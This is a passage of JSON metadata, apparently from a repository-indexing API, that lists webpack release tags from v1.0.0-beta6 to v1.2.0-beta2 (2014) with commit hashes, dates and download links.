s/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b"